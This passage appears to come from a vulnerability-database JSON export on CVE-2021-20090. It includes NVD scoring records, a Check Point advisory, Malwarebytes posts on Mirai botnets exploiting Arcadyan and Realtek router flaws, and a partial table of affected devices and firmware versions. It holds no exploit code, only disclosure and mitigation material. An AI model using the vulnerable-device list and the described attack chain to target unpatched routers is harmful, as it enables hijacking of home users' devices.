{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090"], "modified": "2022-04-26T17:05:00", "cpe": ["cpe:/o:buffalo:wsr-2533dhp3-bk_firmware:1.24", "cpe:/o:buffalo:wsr-2533dhpl2-bk_firmware:1.02"], "id": "CVE-2021-20090", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20090", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:buffalo:wsr-2533dhpl2-bk_firmware:1.02:*:*:*:*:*:*:*", "cpe:2.3:o:buffalo:wsr-2533dhp3-bk_firmware:1.24:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:18", "description": "Wireless devices running certain Arcadyan-derived firmware (such as KPN Experia WiFi 1.00.15) do not properly sanitise user input to the syslog configuration form. An authenticated remote attacker could leverage this to alter the device configuration and achieve remote code execution. This can be exploited in conjunction with CVE-2021-20090.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:15:00", "type": "cve", "title": "CVE-2021-38703", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-38703"], "modified": "2021-09-13T14:11:00", "cpe": ["cpe:/o:kpn:experia_wifi_firmware:1.00.15"], "id": "CVE-2021-38703", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-38703", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:kpn:experia_wifi_firmware:1.00.15:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:17:01", "description": "The Telus Wi-Fi Hub (PRV65B444A-S-TS) with firmware version 3.00.20 is affected by an authenticated command injection vulnerability in multiple parameters passed to tr69_cmd.cgi. A remote attacker connected to the router's LAN and authenticated with a super user account, or using a bypass authentication vulnerability like CVE-2021-20090 could leverage this issue to run commands or gain a shell as root on the target device.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T17:15:00", "type": "cve", "title": "CVE-2021-20122", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20122"], "modified": "2022-06-28T14:11:00", "cpe": ["cpe:/o:telus:prv65b444a-s-ts_firmware:3.00.20"], "id": "CVE-2021-20122", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-20122", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:telus:prv65b444a-s-ts_firmware:3.00.20:*:*:*:*:*:*:*"]}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:38:03", "description": "A directory traversal vulnerability exists in Buffalo routers. Successful exploitation of this vulnerability could allow an attacker to access arbitrary files on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-23T00:00:00", "type": "checkpoint_advisories", "title": "Buffalo Routers Directory Traversal (CVE-2021-20090; CVE-2021-20091)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091"], "modified": "2021-08-23T00:00:00", "id": "CPAI-2021-0497", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-08-09T18:34:08", 
"description": "The early bird catches the worm. Unless the worm was early enough to hide.\n\nOn August 3, 2021 a vulnerability that was discovered by [Tenable](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) was made public. Only two days later, on August 5, [Juniper Threat Labs](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) identified some attack patterns that attempted to exploit this vulnerability in the wild. The vulnerability is listed as CVE-2021-20090.\n\n### Router firmware\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Under the [description of CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>) you will find:\n\n> \u201ca path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.\u201d\n\nBut during the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. In its synopsis, [Tenable lists](<https://www.tenable.com/security/research/tra-2021-13>) some 36 devices that have been confirmed to be affected. The list of affected devices include some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nThe path traversal vulnerability means that some files on the devices can be accessed without authentication because they fall under a bypass list. 
Attackers can use this vulnerability to bypass authentication procedures on the affected routers and modems and, chained with the configuration-injection flaw (CVE-2021-20091) on the Buffalo models, enable the Telnet service, which will allow threat actors to connect to devices remotely and take over control of the affected device. The full technical details of the discovery and the Proof-of-Concept (PoC) can be found in the [Tenable TechBlog](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>).\n\n### Quick response\n\nOnce again, the speed at which disclosed vulnerabilities are weaponized is demonstrated: it only took threat actors two days after the publication of a PoC to add this vulnerability to their arsenal. The threat actor seems to be attempting to deploy a Mirai variant on the affected routers using scripts similar to those found to be used against devices from vendors like SonicWall, D-Link, Netgear, Cisco, Tenda, MicroFocus, and Netis. This same threat actor was found earlier to serve a Mirai variant leveraging [CVE-2021-27561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27561>) and [CVE-2021-27562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27562>), just hours after vulnerability details were published.\n\n### Mirai\n\nMirai is the name of the malware behind one of the most active and well-known Internet-of-Things (IoT) botnets. It started with Mirai taking advantage of insecure IoT devices in a simple but clever way. It scanned big blocks of the internet for open Telnet ports, then attempted to log in using default passwords. 
In this way, it was able to quickly corral an army of small, Internet-connected "smart" devices, like cameras, into a botnet.\n\nYou may remember hearing about this botnet after the [massive East Coast internet outage of 2016](<https://blog.malwarebytes.com/malwarebytes-news/2020/11/iot-antivirus-on-your-smart-device/>) when the Mirai botnet was leveraged in a [DDoS attack](<https://blog.malwarebytes.com/security-world/technology/2018/03/ddos-attacks-are-growing-what-can-businesses-do/>) aimed at Dyn, an Internet infrastructure company. Traffic to Dyn's DNS servers throughout the US\u2014primarily on the East Coast but later on the opposite end of the country as well\u2014was stopped by a flood of malicious requests from tens of millions of IP addresses disrupting the system.\n\nAfter the source code of the original Mirai botnet was leaked, this code was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets. These operators are engaged in an ongoing competition to find new victims and hijack devices from each other. The original authors of Mirai were convicted for leasing their botnet out for DDoS attacks and click fraud. But their successors are still very much using the foundations of the first Mirai botnet.\n\n### Mitigation\n\nThe vulnerability was patched in April and owners of any of the affected devices listed in Tenable's advisory are advised to ask their router vendor for security patches. Tenable reported the issues to the [CERT Coordination Center](<https://kb.cert.org/vuls/>) for help with contacting and tracking all the affected vendors.\n\nWhat is worrying about the current situation is that many of the owners of vulnerable devices are home users that were provided with the device by their internet provider. 
They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nThe post [Home routers are being hijacked using vulnerability disclosed just 2 days ago](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T17:06:56", "type": "malwarebytes", "title": "Home routers are being hijacked using vulnerability disclosed just 2 days ago", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-27561", "CVE-2021-27562"], "modified": "2021-08-09T17:06:56", "id": "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-27T12:34:55", "description": "A few weeks ago we 
blogged about a vulnerability in home routers that was weaponized by the Mirai botnet just two days after disclosure. Mirai hoovers up vulnerable Internet of Things (IoT) devices and adds them to its network of zombie devices, which can then be used to [launch huge Distributed Denial of Service](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) (DDoS) attacks.\n\nLast time it was a [vulnerability in the Arcadyan firmware](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) found in devices distributed by some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nA similar situation is going on right now with routers and Wi-Fi amplifiers that are built on the Realtek RTL819xD chipset. Realtek chipsets are found in many embedded IoT devices. At least 65 vendors are affected. The vulnerabilities enable unauthenticated attackers to fully compromise the target device and execute arbitrary code with the highest level of privilege. Exactly what Mirai wants.\n\n### Vulnerabilities\n\nThe vulnerabilities were found and disclosed by [IoT Inspector](<https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/>), a platform for automated security analysis of IoT firmware. In total they identified more than a dozen vulnerabilities, but one of them (CVE-2021-35395) has already been found to be actively exploited in the wild.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). 
The description of [CVE-2021-35395](<https://nvd.nist.gov/vuln/detail/CVE-2021-35395>) contains a pretty dense explanation, but it boils down as follows.\n\nThere are two types of management interface that can be accessed over the Internet. Both of them are vulnerable to multiple stack buffer overflows due to "unsafe" copying of parameters, and two separate arbitrary command injection problems, again stemming from the apparently unsafe handling of parameters. These allow an attacker to run arbitrary commands on the vulnerable device.\n\nFor anyone unfamiliar with web programming, this implies that the code behind these Internet-exposed management interfaces is failing to perform the most basic security hygiene.\n\nThe description ends:\n\n> Some vendors use [the management interface] as-is, others add their own authentication implementation, some kept all the features from the server, some remove some of them, some inserted their own set of features. However, given that Realtek SDK implementation is full of insecure calls and that developers tends to re-use those examples in their custom code, any binary based on Realtek SDK web server will probably contain its own set of issues on top of the Realtek ones\u2026\n\nIn other words, how vulnerable your device is may depend on whether, and how well, the vendor added their own authentication methods, but vendors may well have added more problems.\n\n### Same botnet, same operator?\n\nWith all the similarities in the vulnerabilities and the speed with which they are being exploited after disclosure, it will not come as a total surprise that the botnet that is actively going after these vulnerable devices is Mirai. Mirai is the name of the malware behind one of the most active and well-known IoT botnets. 
After the source code of the original Mirai botnet was leaked, it was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets.\n\n[Researchers at SAM Seamless Network](<https://securingsam.com/realtek-vulnerabilities-weaponized/>) were able to establish that the web server serving the Mirai botnet behind these attacks uses the same network subnet [seen by Unit 42](<https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/>) in March of 2021, indicating that the same attacker was behind those incidents. Due to the similarity in scripts it was assumed that the same actor was behind the exploitation of the vulnerability listed under CVE-2021-20090 which is present in the Arcadyan firmware.\n\nIt also stands to reason to assume this is the actor that was responsible for the [largest DDoS attack](<https://blog.malwarebytes.com/botnets/2021/08/largest-ddos-attack-ever-reported-gets-hoovered-up-by-cloudflare/>) recorded to date, just last week.\n\n### Mitigation\n\nRealtek has since [patched](<https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf>) the vulnerabilities, but it will take a while for manufacturers who use their chipset to make the patches available to their customers. And again many of the owners of vulnerable devices are home users. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nRealTek is a common chipset used for sound and Wi-Fi by many vendors such as ARRIS, ASUSTek, Belkin, Buffalo, D-Link, EnGenius, Huawei, LG, Logitec, NetGear, TRENDnet, and many more. I found a [list of affected devices courtesy of Mainstream Technologies](<https://www.mainstream-tech.com/realtek-security-notice/>) but this is only a partial list. 
Alongside its list, Mainstream Technologies warns that: "If your device is over 10 years old, it definitely will not get a patch. If it is over 5 years it probably will not get a patch".\n\nSo even if your device is not on it, that doesn\u2019t mean it\u2019s not vulnerable. Any device that uses a Realtek RTL819xD chipset is potentially vulnerable, and the bots scanning the internet for vulnerable devices will definitely be able to find them.\n\nCases like these could end up being a deciding factor in the discussion whether vendors/governments/[law enforcement](<https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/>) should be allowed to patch vulnerable systems that do not belong to them or to the infrastructure they are responsible for.\n\nStay safe, everyone!\n\nThe post [Realtek-based routers, smart devices are being gobbled up by a voracious botnet](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-24T13:36:52", "type": "malwarebytes", "title": "Realtek-based routers, smart devices are being gobbled up by a voracious botnet", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-35392", "CVE-2021-35395"], "modified": "2021-08-24T13:36:52", "id": "MALWAREBYTES:B1913B0E7CB2A0C66E627673482C42E7", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/realtek-based-routers-smart-devices-are-being-gobbled-up-by-a-voracious-botnet/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-14T00:05:09", "description": "In [a joint cybersecurity advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. 
The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that need to be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vulnerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let attackers execute malicious code on a compromised, remote computer. 
The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read\n\nThe advisory identifies two arbitrary file read flaws--[CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>) and 
[CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>)--which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw that allows attackers to inject data into an affected system's command line.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. 
[CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all forms of path traversal attack.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * Apply patches as they come, prioritizing the most critical flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, 
"impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-08-11T13:47:42", "description": "Tenable has discovered multiple vulnerabilities in routers manufactured by Arcadyan.\n\nDuring the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. 
\n\nPlease note that CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models.\n\nCVE-2021-20090 : Path Traversal\nCVSSv3 Base Score: 8.1\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\nA path traversal vulnerability in the web interfaces of networking devices manufactured by Arcadyan, including Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24, could allow unauthenticated remote attackers to bypass authentication.\nThis vulnerability has also been confirmed to affect the following devices\nnote: the firmware versions listed do not indicate the latest affected firmware versions, only the firmware versions on which the issue was confirmed.\nPlease contact the devices' respective vendors for more information.\n\n| Vendor | Device | Found on version |\n| :-----| ----: | :----: |\n| ADB | ADSL wireless IAD router | 1.26S-R-3P |\n| Arcadyan | ARV7519 | 00.96.00.96.617ES |\n| Arcadyan | VRV9517 | 6.00.17 build04 |\n| Arcadyan | VGV7519 | 3.01.116 |\n| Arcadyan | VRV9518 | 1.01.00 build44 |\n| ASMAX | BBR-4MG / SMC7908 ADSL | 0.08 |\n| ASUS | DSL-AC88U (Arc VRV9517) | 1.10.05 build502 |\n| ASUS | DSL-AC87VG (Arc VRV9510) | 1.05.18 build305 |\n| ASUS | DSL-AC3100 | 1.10.05 build503 |\n| ASUS | DSL-AC68VG | 5.00.08 build272 |\n| Beeline | Smart Box Flash | 1.00.13_beta4 |\n| British Telecom | WE410443-SA | 1.02.12 build02 |\n| Buffalo | WSR-2533DHPL2 | 1.02 |\n| Buffalo | WSR-2533DHP3 | 1.24 |\n| Buffalo | BBR-4HG | |\n| Buffalo | BBR-4MG | 2.08 Release 0002 |\n| Buffalo | WSR-3200AX4S | 1.1 |\n| Buffalo | WSR-1166DHP2 | 1.15 |\n| Buffalo | WXR-5700AX7S | 1.11 |\n| Deutsche Telekom | Speedport Smart 3 | 010137.4.8.001.0 |\n| HughesNet | HT2000W | 0.10.10 |\n| KPN | ExperiaBox V10A (Arcadyan VRV9517) | 5.00.48 build453 |\n| KPN | VGV7519 | 3.01.116 |\n| O2 | HomeBox 6441 | 1.01.36 |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| 
